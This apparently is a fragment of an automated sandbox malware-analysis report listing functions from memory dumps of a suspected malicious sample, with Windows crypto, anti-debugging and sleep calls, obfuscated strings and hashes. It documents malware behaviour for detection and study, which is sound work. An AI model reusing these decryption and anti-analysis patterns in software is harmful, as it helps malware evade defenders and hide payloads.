                                          • String ID: KDOX$]DFE$^OX*$viFO
                                          • API String ID: 529012138-4238671514
                                          • Opcode ID: d653516d6fcac4cfb1a3aecc6086a08e4b36a7bab3ac3c77805d5c8949ef4ee8
                                          • Instruction ID: cda3418ce393825e0902ee8b5d8ab36aef963833617a8ff5b5b3be6bbc790cd0
                                          • Opcode Fuzzy Hash: d653516d6fcac4cfb1a3aecc6086a08e4b36a7bab3ac3c77805d5c8949ef4ee8
                                          • Instruction Fuzzy Hash: DEF204B0E042589FEB24CF24CC48BADBBB0EF85304F5442E8E5096B291DB75BA85DF55
                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 04D03426
                                          • __Init_thread_footer.LIBCMT ref: 04D03602
                                          • __Init_thread_footer.LIBCMT ref: 04D038F7
                                          • __Init_thread_footer.LIBCMT ref: 04D03ABD
                                          • __Init_thread_footer.LIBCMT ref: 04D044BD
                                          • __Init_thread_footer.LIBCMT ref: 04D047CB
                                          • __Init_thread_footer.LIBCMT ref: 04D03D55
                                            • Part of subcall function 04D0FBE2: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D0FC16
                                          • __Init_thread_footer.LIBCMT ref: 04D03FBE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000003.1947099269.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                          Similarity
                                          • API ID: Init_thread_footer$Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: KDOX$]DFE$^OX*$viFO
                                          • API String ID: 829385169-4238671514
                                          • Opcode ID: d653516d6fcac4cfb1a3aecc6086a08e4b36a7bab3ac3c77805d5c8949ef4ee8
                                          • Instruction ID: 88129635c1eb5b3cbac3c2365f4df0ed5b7c99a00c2ac15b0ae6a711a23d9b97
                                          • Opcode Fuzzy Hash: d653516d6fcac4cfb1a3aecc6086a08e4b36a7bab3ac3c77805d5c8949ef4ee8
                                          • Instruction Fuzzy Hash: 89F2E1B0E042189BEB24DF24DC58BADBBB1EF05304F5482D8E5096B2D1DB74BA85CF65
                                          APIs
                                          • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042C014), ref: 04B43897
                                          • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 04B438BB
                                          • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 04B43925
                                          • GetLastError.KERNEL32 ref: 04B4392F
                                          • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 04B43957
                                          • GetLastError.KERNEL32 ref: 04B43961
                                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04B43971
                                          • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 04B43A33
                                          • CryptDestroyKey.ADVAPI32(?), ref: 04B43AA5
                                          Strings
                                          • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 04B43873
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                                          • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                          • API String ID: 3761881897-63410773
                                          • Opcode ID: 40fbdad3a39ca36db9715c34553cb7c87d5092a534739f652b7b7891191c3091
                                          • Instruction ID: 1645571ac4fe89431ac4df9a00a243196a34f88d4258cdeec03d9230bf959f54
                                          • Opcode Fuzzy Hash: 40fbdad3a39ca36db9715c34553cb7c87d5092a534739f652b7b7891191c3091
                                          • Instruction Fuzzy Hash: AC814F71B002189FEF249F24CC45B9EBBB5EF89300F1481E9E94DA7291DB31AE859F51
                                          APIs
                                            • Part of subcall function 04B50A49: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04B45CE6,00000000,0042C014), ref: 04B50A5E
                                            • Part of subcall function 04B50A49: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04B50A7D
                                            • Part of subcall function 04B49EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B49EF7
                                            • Part of subcall function 04B49EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B49F34
                                          • __Init_thread_footer.LIBCMT ref: 04B45324
                                          • Sleep.KERNEL32(00000BB8,00000000,?,04B46CE8,0041D8A0,0042DB20,0042DB21), ref: 04B4553C
                                          • __Init_thread_footer.LIBCMT ref: 04B45632
                                          • Sleep.KERNEL32(000007D0), ref: 04B4599C
                                          • Sleep.KERNEL32(000007D0), ref: 04B459B6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep$CriticalInit_thread_footerSectionTime$EnterFileLeaveSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: DFEK$updateSW
                                          • API String ID: 3554146954-1114742100
                                          • Opcode ID: 77110f7e8cc78f45bd0e6b43112bb3db69cfffe81fb6a3c2c0fb0262c7cc4dea
                                          • Instruction ID: 66853d13e50159b3454c72ceac9a9fb111e37690f54be8abbdb1fea14e4424e0
                                          • Opcode Fuzzy Hash: 77110f7e8cc78f45bd0e6b43112bb3db69cfffe81fb6a3c2c0fb0262c7cc4dea
                                          • Instruction Fuzzy Hash: 4A3235B1E002549BEF28DF24CC987AEBBB0EF85304F1442E9D4096B291DB74AE85DF55
                                          APIs
                                            • Part of subcall function 04D0FBE2: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D0FC16
                                          • __Init_thread_footer.LIBCMT ref: 04D044BD
                                          • __Init_thread_footer.LIBCMT ref: 04D047CB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000003.1947099269.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                          Similarity
                                          • API ID: Init_thread_footer$Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: DFEK$U%
                                          • API String ID: 829385169-3435397596
                                          • Opcode ID: 41cbdf90dec37eb52b954d10541310d96c062ecf6e52845e935639f857fb7cc0
                                          • Instruction ID: 01384debf471ce94e14142a97189ff0586a5139a176f32076495f655a9d5bb9b
                                          • Opcode Fuzzy Hash: 41cbdf90dec37eb52b954d10541310d96c062ecf6e52845e935639f857fb7cc0
                                          • Instruction Fuzzy Hash: 78D2F271E002149BEB15EF24DC54BEDBBB5EF40308F5481A9E8096B2D1DB74BA85CFA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609374987.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: J)w$TC_$gu3_$r8o$rai$E$$pg
                                          • API String ID: 0-4225702690
                                          • Opcode ID: 541edf960c7bc0efe8943d03aa0e69603412f0b19c9ad9368ec7df62add18483
                                          • Instruction ID: d444fe6848e132500915e3207691af2711fdcf4ee07d177f53029a34b9e47641
                                          • Opcode Fuzzy Hash: 541edf960c7bc0efe8943d03aa0e69603412f0b19c9ad9368ec7df62add18483
                                          • Instruction Fuzzy Hash: F6B22AF36082049FE7046E2DED8577ABBE6EBD4320F1A463DEAC4C7744E93598058693
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: __floor_pentium4
                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                          • API String ID: 4168288129-2761157908
                                          • Opcode ID: e4a2af43c5bc17daceace0d9627c377d7fa11afa99750231fbf68f24f9a3cb98
                                          • Instruction ID: 71a107362d346717e648338213b5422f70619b5b18563a803cf0c70334ea4234
                                          • Opcode Fuzzy Hash: e4a2af43c5bc17daceace0d9627c377d7fa11afa99750231fbf68f24f9a3cb98
                                          • Instruction Fuzzy Hash: 78D22771E092288FDB65CE28DD407EAB7B5EB44314F1441EAD44DE7240E778AEC58F86
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609374987.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: v7$v7$'Tw7$1.):$P}R
                                          • API String ID: 0-381938978
                                          • Opcode ID: eefc603d710d323a7ce6b53ed6e806ee38cc0474dbe6ff2171373bf7df0ce505
                                          • Instruction ID: f48e6158a87bb4e8efd35172d846ca36899a6cc2dff6538b7a18cdffa35fb23d
                                          • Opcode Fuzzy Hash: eefc603d710d323a7ce6b53ed6e806ee38cc0474dbe6ff2171373bf7df0ce505
                                          • Instruction Fuzzy Hash: 1AB2D7F360C200AFE7046E2DED8567AFBE9EBD4720F16892DE6C4C3744E63598058696
                                          APIs
                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,(@), ref: 0040CE9B
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,(@), ref: 0040CEA5
                                          • UnhandledExceptionFilter.KERNEL32(004024E3,?,?,?,?,?,(@), ref: 0040CEB2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID: (@
                                          • API String ID: 3906539128-3675327911
                                          • Opcode ID: 699cb89c4481d733bc24bc723ff59a4702c04dd7a22af15121b47e74e86c8d00
                                          • Instruction ID: 588a31918c4d7a6a9ba75f52031696ab4f5dbddd8307c033202189b188a5c7dc
                                          • Opcode Fuzzy Hash: 699cb89c4481d733bc24bc723ff59a4702c04dd7a22af15121b47e74e86c8d00
                                          • Instruction Fuzzy Hash: 5E31C475911228ABCB21DF65D8897CDBBB4AF08310F5081EAE40CA7291E7749F858F48
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609374987.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: :Bw>$E}z$q=O$`z
                                          • API String ID: 0-378374265
                                          • Opcode ID: 07de1eb6a4442bbb8de49f0d2f91b21c6223b1c9db6def9833c423f3edfcc12b
                                          • Instruction ID: e2358c4a30078fa431a7d20a68ec40ac9c87760e47c98e988d422ca1f2da144e
                                          • Opcode Fuzzy Hash: 07de1eb6a4442bbb8de49f0d2f91b21c6223b1c9db6def9833c423f3edfcc12b
                                          • Instruction Fuzzy Hash: FAB208F3A082049FE304AE2DEC8567AFBE9EF94320F1A453DEAC4C7744E67558058697
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                          • Instruction ID: 0ba3100eaa4fdd45da6491ff5e81cab4f65e130d924c1b74629f7bd5c212e1c9
                                          • Opcode Fuzzy Hash: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                          • Instruction Fuzzy Hash: EE022C71E012199FDF14DFA8C9807AEFBB5FF48314F2486A9D919AB390D731A941CB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000003.1947099269.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                          • Instruction ID: 6c2d7a8c146462ba5a324ea9cfa0bf9606b88200bf4d53bcd6c6f7975e9f1e9e
                                          • Opcode Fuzzy Hash: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                          • Instruction Fuzzy Hash: 70024E71E00219ABDB15DFA8D8807AEBBF1FF48314F248269D919EB391D731A945CB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                          • Instruction ID: 1698085c936ca5c6c6a57ee88efec3ce2b030c017204745a192f91a5fd5d0df0
                                          • Opcode Fuzzy Hash: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                          • Instruction Fuzzy Hash: 8A025C71E002199BDF14CFA9D9806EEBBF1FF48314F24826AE919E7341D775A9818B84
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609374987.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 2-$Bn$G;\_$k&[
                                          • API String ID: 0-2792162061
                                          • Opcode ID: 7980ee049aa2ac19cea230c4e1b6ac398d022dba72b1951425a8ef2c8c7c688f
                                          • Instruction ID: 69de963429b609f0fa99bfcb35659f77edb65c9a1995e4ca6f8fe7439ca4a303
                                          • Opcode Fuzzy Hash: 7980ee049aa2ac19cea230c4e1b6ac398d022dba72b1951425a8ef2c8c7c688f
                                          • Instruction Fuzzy Hash: EB92E4F3A0C2009FE7046E2DEC8567ABBE9EFD4720F1A893DE6C483744E67558058697
                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(00000017,12041A13), ref: 04B4A7BD
                                          • IsDebuggerPresent.KERNEL32 ref: 04B4A889
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 04B4A8A9
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 04B4A8B3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                          • String ID:
                                          • API String ID: 254469556-0
                                          • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                          • Instruction ID: 07410a963a08223e990533a2d5d27bc6f464717d2e4aa27064386d5b49861af0
                                          • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                          • Instruction Fuzzy Hash: D0312975D45218DBEB10DFA4D9897CCBBB8FF48304F1040EAE40DAB250EB71AA859F45
                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(00000017,12041A13), ref: 0040A556
                                          • IsDebuggerPresent.KERNEL32 ref: 0040A622
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040A642
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 0040A64C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                          • String ID:
                                          • API String ID: 254469556-0
                                          • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                          • Instruction ID: 8b01d550a0a2fff4667565f177a0bd7aa15c2cc699040a0714bae659939ad5a8
                                          • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                          • Instruction Fuzzy Hash: 40311A75D0531CDBDB10DFA5D9897CDBBB8BF08304F1080AAE409A7290EB759A858F49
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000003.1947099269.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 0.@$P.@$p.@$p.@P.@0.@
                                          • API String ID: 0-3587633984
                                          • Opcode ID: b422344de76828a5e8cbae21da2638b275dc5e39bbf3ab9b9d7bd40fd995c566
                                          • Instruction ID: fbb2ff2264b49390f5b26b2455b6abd2fd81030c5558e074f1e74025330fed94
                                          • Opcode Fuzzy Hash: b422344de76828a5e8cbae21da2638b275dc5e39bbf3ab9b9d7bd40fd995c566
                                          • Instruction Fuzzy Hash: 23F1AD71B01215ABDB14CF68DC89BA9B7A4FF48304F5481A9E909EB6C1E771FC11CBA4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609374987.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LtE$U:m$bz{
                                          • API String ID: 0-3284483868
                                          • Opcode ID: 60bd2dbc7ad213160e057d8f2fdc9435d286d836660379c1e0949df821c6aac5
                                          • Instruction ID: de16fc79d3a2352f5374d9b53ac236092c96b8400d6cdec399693f4a7c027abe
                                          • Opcode Fuzzy Hash: 60bd2dbc7ad213160e057d8f2fdc9435d286d836660379c1e0949df821c6aac5
                                          • Instruction Fuzzy Hash: 31B207F3A0C204AFE304AE29DC8567AF7E9EF94720F1A493DE6C4C3744EA7558058697
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609374987.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8KYq$E#h$`T?
                                          • API String ID: 0-1493343082
                                          • Opcode ID: d7dc5cae8670bf1926e6889c6d7773dbd30787f02f282612179521f555de2beb
                                          • Instruction ID: 4f1e9d757a86ed02a19fbbc57b87ba041b77dbca36ec5aad2bb14136ae14255a
                                          • Opcode Fuzzy Hash: d7dc5cae8670bf1926e6889c6d7773dbd30787f02f282612179521f555de2beb
                                          • Instruction Fuzzy Hash: C58218F3A082049FE7086E2DEC8577AFBE9EB94720F1A453DEAC5C3744E93558048697
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609374987.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,VW$Gxq$xF^
                                          • API String ID: 0-4068200575
                                          • Opcode ID: 2b387fce281c06bb67075f6e1cf62dbafa86aba6795307e76e20542cb472ef26
                                          • Instruction ID: c29d188526dd612a016900c2e9faf38d682a95d7f052aaa433906ebfa9d76204
                                          • Opcode Fuzzy Hash: 2b387fce281c06bb67075f6e1cf62dbafa86aba6795307e76e20542cb472ef26
                                          • Instruction Fuzzy Hash: 635249F3A0C204AFE7046E2DEC8577ABBE9EF94760F1A493DE6C4C3744E63558018696
                                          APIs
                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,04B42A70), ref: 04B4D102
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,04B42A70), ref: 04B4D10C
                                          • UnhandledExceptionFilter.KERNEL32(04B4274A,?,?,?,?,?,04B42A70), ref: 04B4D119
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID:
                                          • API String ID: 3906539128-0
                                          • Opcode ID: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                                          • Instruction ID: 2306313b9a453870beb1b889e96d67ec782bbdad9162cccf3978907279cce485
                                          • Opcode Fuzzy Hash: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                                          • Instruction Fuzzy Hash: 1531A274901228ABDB21DF64DC887CDBBB8BF58310F5041EAE81CA7250E770AB859F45
                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F47
                                          • TerminateProcess.KERNEL32(00000000,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F4E
                                          • ExitProcess.KERNEL32 ref: 10005F60
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2612219452.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2612202169.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612243212.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612263548.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID:
                                          • API String ID: 1703294689-0
                                          • Opcode ID: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                          • Instruction ID: 146749da7bea6e31057676a24497a7e39fcb2650f4e844f2ac51073fb5c6c599
                                          • Opcode Fuzzy Hash: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                          • Instruction Fuzzy Hash: 02E08631404589EFEF069F10CD4CA993B69FB442C2B008024F50D8A135CB7AEDD1CB41
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609374987.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: OBX}$px?2
                                          • API String ID: 0-3196702507
                                          • Opcode ID: 749198263956f03e9fbff5c52ee38caa58488fa83737f8a18cfe0572b069469b
                                          • Instruction ID: 06edaea30c75f07298c90bc1e8ee94e3f1231372c13caf2fb5d883e5081403e4
                                          • Opcode Fuzzy Hash: 749198263956f03e9fbff5c52ee38caa58488fa83737f8a18cfe0572b069469b
                                          • Instruction Fuzzy Hash: 67B219F36082049FE3046E2DEC8577ABBEAEFD4720F1A463DEAC4C3744E97558058696
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609374987.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 6!v$U_{
                                          • API String ID: 0-1119225981
                                          • Opcode ID: aae0d6efde10b3f62777932ea34941a1dd2a99ae29d4051e3aa1b1920cde45e5
                                          • Instruction ID: 3da5af08ecd6ff21460da44b49c8c4fae759b0ea5b6404982a76f1521570ac52
                                          • Opcode Fuzzy Hash: aae0d6efde10b3f62777932ea34941a1dd2a99ae29d4051e3aa1b1920cde45e5
                                          • Instruction Fuzzy Hash: 79B227F3A0C2009FE7046E2DEC8567ABBE5EF94720F1A493DEAC4C7744EA3558058697
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609374987.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: v!n}$>_
                                          • API String ID: 0-2530240750
                                          • Opcode ID: 76f83f22555b00c3ec49509123aa2191abe38450b6512065ce30150b3a3737fb
                                          • Instruction ID: 1ec2e035bbc37acf7876f7d1f7b4bb6d55d71cb3502c8cef8ff1282a40da3fc1
                                          • Opcode Fuzzy Hash: 76f83f22555b00c3ec49509123aa2191abe38450b6512065ce30150b3a3737fb
                                          • Instruction Fuzzy Hash: AEB2F3F360C204AFE304AE29EC8567ABBE9EF94320F16893DE6C4C7744E63558458797
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609374987.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 0U?o$;_~$fs.
                                          • API String ID: 0-3839591142
                                          • Opcode ID: 2d3fb009facc8211be82870afde5675eb82b50d1c3de2f5320f6b3e3a8c7f763
                                          • Instruction ID: 6056c8ee8145d9aa544b76b7876f4156dcd42fefd5dfb33500ad2ce884fff2aa
                                          • Opcode Fuzzy Hash: 2d3fb009facc8211be82870afde5675eb82b50d1c3de2f5320f6b3e3a8c7f763
                                          • Instruction Fuzzy Hash: 88517BF7A096045FF340992DED847BBB7CBDBD0320F1AC539EA8483B48E93959094291
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: .$GetProcAddress.$l
                                          • API String ID: 0-2784972518
                                          • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                          • Instruction ID: d5037ae184a1353f3a29f5d41dbbdc7d36793d66b344cbbfc880b87a4d66a8bb
                                          • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                          • Instruction Fuzzy Hash: FB316CB6910609DFEB10DF99C880AAEBBF5FF48324F14408AD941A7310D771FA45DBA4
                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A7F,00000000,F6E2F767), ref: 004107F7
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410816
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID:
                                          • API String ID: 1518329722-0
                                          • Opcode ID: 5c7dfd05e128c4447f34c82fa0a83ef235602569a1e055a837d6a0b3eab8545e
                                          • Instruction ID: 9ffaf8f16d1feaf21b4895ba9d91ffe558ea63f081936d9fadb7ea4d2284f30e
                                          • Opcode Fuzzy Hash: 5c7dfd05e128c4447f34c82fa0a83ef235602569a1e055a837d6a0b3eab8545e
                                          • Instruction Fuzzy Hash: C2F0F4B5A002147F8724EF6EC8049DFBEE9EBC5370725826AE809D3340D9B4DD82C2D4
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000003.1947099269.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                          Similarity
                                          • API ID: __floor_pentium4
                                          • String ID:
                                          • API String ID: 4168288129-0
                                          • Opcode ID: 33b49f04a218de2c7083f10be8a0aa68633273c3dfcf1cc45880ee3ed5084c1c
                                          • Instruction ID: 1ed8da1ddc72e2c14096d127d2f8598391556a2cb2ec996d4bb7a4d454f66de2
                                          • Opcode Fuzzy Hash: 33b49f04a218de2c7083f10be8a0aa68633273c3dfcf1cc45880ee3ed5084c1c
                                          • Instruction Fuzzy Hash: 32D228B1E092289FDB65CE28ED507EAB7B5FB44304F1441EAD84DE7250E778AA85CF40
                                          Strings
